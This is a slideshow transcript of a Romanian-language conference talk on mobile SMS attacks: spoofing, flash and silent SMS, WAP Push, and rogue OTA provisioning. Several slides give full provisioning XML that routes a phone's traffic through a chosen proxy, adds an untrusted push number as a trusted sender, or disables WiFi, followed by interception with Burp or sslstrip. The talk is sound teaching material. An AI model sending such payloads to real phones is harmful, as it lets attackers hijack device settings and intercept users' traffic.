Successfully reported this slideshow.

Securitatea mobila - Atacuri prin SMS

662 views

Published on

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Securitatea mobila - Atacuri prin SMS

  1. 1. Securitate mobila – Atacuri prin SMS Prezentator: Bogdan ALECU http://m-sec.net Twitter: @msecnet
  2. 2. Informatii generale despre SMSAmenintariWAPInterceptare trafic de dateDemo
  3. 3. Informatii generaleSMS - Short Message Service reprezinta unmod de comunicare prin mesaje text intretelefoanele mobile / fixe, utilizand un protocolstandardizat. Este un mod de comunicareeficace; utilizatorul scrie un text, apasa SEND simesajul e livrat aproape instant catre destinatar.Folosit pentru mai multe scopuri: MMS –Multimedia Messaging Service, OTA – Over TheAir – configurarea telefonului, notificari pentrumesageria vocala, email, fax, microplati – plataunor sume mici pentru diferite servicii =>SECURITATE!
  4. 4. Informatii generale“Un dispozitiv mobil activ trebuie sa fiecapabil de a primi un mesaj scurt detipul TPDU - Transfer protocol data unit- (SMS-DELIVER) in orice moment,indiferent daca exista un apel sau traficde date in derulare. Un raport va fitrimis intotdeauna catre SC (Serviciulde mesaje); confirmand fie ca tel aprimit mesajul sau ca mesajul nu a fostlivrat, incluzind si motivul refuzului.”ETSI TS 100 901 V7.5.0 (2001-12), pag13
  5. 5. Amenintari - SMSSMS SPAMSMS spoofingNotificari SMSAlte tipuri
  6. 6. Amenintari - SMS SMS SPAMCompaniile ofera servicii de publicitate prin SMSMesaje cu castiguri falseInginerie sociala – “Suna-ma urgent pe nr asta: 0900323421! Mama”
  7. 7. Amenintari - SMS SMS SpoofingServicii online ce permit modificarea expeditorului (numeric / alfanumeric)Greu de oprit, mai ales daca tinem cont de roamingEficienta mai mare in atacurile de tip inginerie sociala
  8. 8. Amenintari - SMS Notificari SMSVoicemailFaxE-mailVideoUtilizatorul nu poate scoate icon-ul de notificare asupra primirii unui astfel de mesaj
  9. 9. Amenintari - SMSNotificari SMS(voicemail)
  10. 10. Amenintari - SMSNotificari SMS(email)
  11. 11. Amenintari - SMS Alte tipuriFlash SMS (Class 0) – utilizatorul vede mesajul direct, fara a intra in InboxSilent SMS – DCS 0xC0 = Message Waiting Indication Group: Discard Message
  12. 12. Amenintari - SMS Alte tipuriFlash SMS
  13. 13. Amenintari - SMS Alte tipuriSilent SMS
  14. 14. WAPWireless Application ProtocolArhitectura de retea specificaSet de reguliLimbaj specific: Wireless Markup Language(WML)Pagini HTML ajustate pentru dimensiuneaecranului telefonului
  15. 15. WAP
  16. 16. WAP PushPermite trimiterea de continut WAP cu ointerventie minima din partea utilizatorului2 tipuri: Service Indication / Service Load
  17. 17. WAP PushService Indication (SI) permite trimitereade notificari utilizatorului intr-un modasincron
  18. 18. WAP PushService Indication (SI)
  19. 19. WAP PushService Load (SL) determina “aplicatia” depe telefon sa incarce si execute unserviciu
  20. 20. WAP PushService Load (SL)
  21. 21. WAP Push - securitate Teoria: Doar un anumit numar este autorizat pentru trimitere; Practica: daca nu e configurat bine, un telefon accepta de la orice numar astfel de mesaje Pe Windows Mobile trebuiesc verificate setarile din HKLMSecurityPoliciesPolicies; SL Message Policy ; (default: SECROLE_PPG_TRUSTED) [HKEY_LOCAL_MACHINESecurityPoliciesPolicies] "0000100c"=dword:800 ; SI Message Policy ; (default: SECROLE_PPG_AUTH | SECROLE_PPG_TRUSTED) [HKEY_LOCAL_MACHINESecurityPoliciesPolicies] "0000100d"=dword:c00
  22. 22. WAP Push - securitateSECROLE_PPG_TRUSTED: Trusted Push ProxyGateway. Messages assigned this role indicatethat the content sent by the Push Initiator istrusted by the Push Proxy Gateway. This roleimplies that the device trusts the Push ProxyGateway (SECROLE_TRUSTED_PPG).SECROLE_PPG_AUTH: Push InitiatorAuthenticated. Messages assigned this roleindicate that the Push Initiator is authenticated bythe Push Proxy Gateway. This role implies thatthe device trusts the Push Proxy Gateway(SECROLE_TRUSTED_PPG).
  23. 23. WAP Push - securitate
  24. 24. WAPConfigurarea telefonului pentru acces la Internet/ date poate fi facuta manualPentru o configurare mai usoara, rapida sipentru eventualele schimbari, a fost creat unstandard ce permite configurarea de la distantaProgramarea Over The Air (OTA) folosestestandardul OMA – Open Mobile AllianceProgramarea se face prin SMS-uri specialconcepute
  25. 25. WAP - provisioningFoloseste protocolul WAPWBXML (WAP Binary XML) prin WirelessApplication EnvironmentWireless Session ProtocolWireless Datagram ProtocolSMS
  26. 26. WAP - provisioningConfigurarea se scrie in XML (conformspecificatiilor de lahttp://www.openmobilealliance.org)XML-ul se va codifica in WAP Binary XMLWBXML se va encapsula intr-o data de tipWireless Session ProtocolDatele se vor codifica intr-un mesaj Push, definitin Wireless Session Protocol
  27. 27. WAP - provisioningMesajul Push contine diferiti parametri,unul fiind parametrul “SEC” pentruautentificare pe baza de “cheie” comunaUSERPIN: string ASCII codificat inzecimaleNETWPIN: cheia este specifica retelei sicunoscuta (teoretic) doar de catre operatorUSERNETWPIN: combinatie a celor 2
  28. 28. WAP - provisioningNETWPIN: IMSI = MCC+MNC+MSIN(Mobile Subscription IdentificationNumber)Pret: 2-5 euro-centiIn general limitat pentru companii, se cereun volum mare de interogari
  29. 29. WAP - provisioning<wap-provisioningdoc><characteristic type="NAPDEF"><parm name="NAME" value="NewAPN"/><parm name="NAPID" value="NewAPN_NAPID_ME"/><parm name="BEARER" value="GSM-GPRS"/><parm name="NAP-ADDRESS" value="apn.operator.ro"/><parm name="NAP-ADDRTYPE" value="APN"/></characteristic><characteristic type=“APPLICATION"><parm name="NAME" value="NewAPN"/><parm name="APPID" value="w2"/><parm name="TO-NAPID" value="NewAPN_NAPID_ME"/></characteristic><wap-provisioningdoc>
  30. 30. WAP - provisioning<wap-provisioningdoc> - contine toata informatia transmisa<characteristic …> - grupeaza informatia in unitati logice<… value="NAPDEF"/> - configuram un nou network access point<parm name="APPID" value="w2"/> - mapeaza configuratia la activitatile de browsingInformatii la http://www.openmobilealliance.org
  31. 31. WAP - provisioning<wap-provisioningdoc><characteristic type="BOOTSTRAP"><parm name="NAME" value=“Operator NET"/><parm name="PROXY-ID" value="OpNET_Proxy"/></characteristic><characteristic type="NAPDEF"><parm name="NAME" value="OpNET"/><parm name="NAPID" value="OpNET_NAPID"/><parm name="BEARER" value="GSM-GPRS"/><parm name="NAP-ADDRESS" value="net"/><parm name="NAP-ADDRTYPE" value="APN"/></characteristic>
  32. 32. WAP - provisioning<characteristic type="PXLOGICAL"><parm name="NAME" value="OpNET"/><parm name="PROXY-ID" value="OpNET_Proxy"/><characteristic type="PXPHYSICAL"><parm name="PHYSICAL-PROXY-ID" value="OpNET_PhProxy"/><parm name="PXADDR" value=“192.168.1.1"/><parm name="PXADDRTYPE" value="IPV4"/><parm name="TO-NAPID" value="OpNET_NAPID"/><characteristic type="PORT"><parm name="PORTNBR" value="8080"/></characteristic></characteristic></characteristic>
  33. 33. WAP - provisioning<characteristic type="APPLICATION"><parm name="APPID" value="w2"/><parm name="NAME" value="OpNET"/><parm name="TO-PROXY" value="OpNET_Proxy"/><characteristic type="RESOURCE"><parm name="NAME" value="OpNET"/><parm name="URI" value="http://www.google.com"/><parm name="STARTPAGE"/></characteristic></characteristic></wap-provisioningdoc>
  34. 34. WAP - provisioningTeoretic aceasta configurare poate fi facutadoar de catre operator, de la un numarpredefinitPutem analiza SMS-ul prin WireSharkPutem adauga un alt numar
  35. 35. WAP - provisioning<?xml version="1.0"?><!DOCTYPE wap-provisioningdoc PUBLIC "-//WAPFORUM//DTD PROV 1.0//EN" wap- "- "http://www.wapforum.org/DTD/prov.dtd"> "http://www.wapforum.org/DTD/prov.dtd"><wap-provisioningdoc version="1.1"> wap-<characteristic type="BOOTSTRAP"><parm name="NAME" value=“Nume"/> value=“ Nume"/></characteristic><characteristic type="PXLOGICAL"><parm name="NAME" value=“Nume"/> value=“ Nume"/><parm name="PROXY-ID" value="Trusted_Proxy"/> name="PROXY- value="Trusted_Proxy"/><parm name="NAME" value="Trusted Proxy"/><characteristic type="PXPHYSICAL"><parm name="PHYSICAL-PROXY-ID" value="Trusted_PhProxy"/> name="PHYSICAL- PROXY- value="Trusted_PhProxy"/><parm name="PXADDR" value="40711111111"/><parm name="PXADDRTYPE" value="E164"/><parm name="TO-NAPID" value="Trusted_NAPID"/> name="TO- value="Trusted_NAPID"/><parm name="PUSHENABLED" value="1"/><parm name="PULLENABLED" value="1"/></characteristic></characteristic><characteristic type="NAPDEF"><parm name="NAME" value="Op"/><parm name="NAPID" value="Trusted_NAPID"/> value="Trusted_NAPID"/><parm name="BEARER" value="GSM-SMS"/> value="GSM-<parm name="NAME" value="Trusted Proxy"/><parm name="NAP-ADDRESS" value=" 40711111111 "/> name="NAP-<parm name="NAP-ADDRTYPE" value="E164"/> name="NAP-</characteristic>
  36. 36. WAP - provisioning<wap-provisioningdoc> <characteristic type="NetworkPolicy"> <characteristic type="WiFi"> <characteristic type="Settings"> <parm name="Disabled" value="1"/> </characteristic> </characteristic> </characteristic></wap-provisioningdoc>
  37. 37. Interceptare traficTraficul trece prin proxy-ul nostruVarianta 1 – Burp Proxy
  38. 38. Interceptare traficTraficul trece prin proxy-ul nostruVarianta 2 – sslstriphttp://www.thoughtcrime.org/software/sslstrip/
  39. 39. Interceptare traficDEMO
  40. 40. ProtectieOperatorul poate filtra aceste tipuri demesajeProducatorii de telefoane trebuie sa seconcentreze mai mult pe securitateVerificati constant (la fel cum faceti cufactura / creditul disponibil) setarile deInternet
  41. 41. Intrebari?

×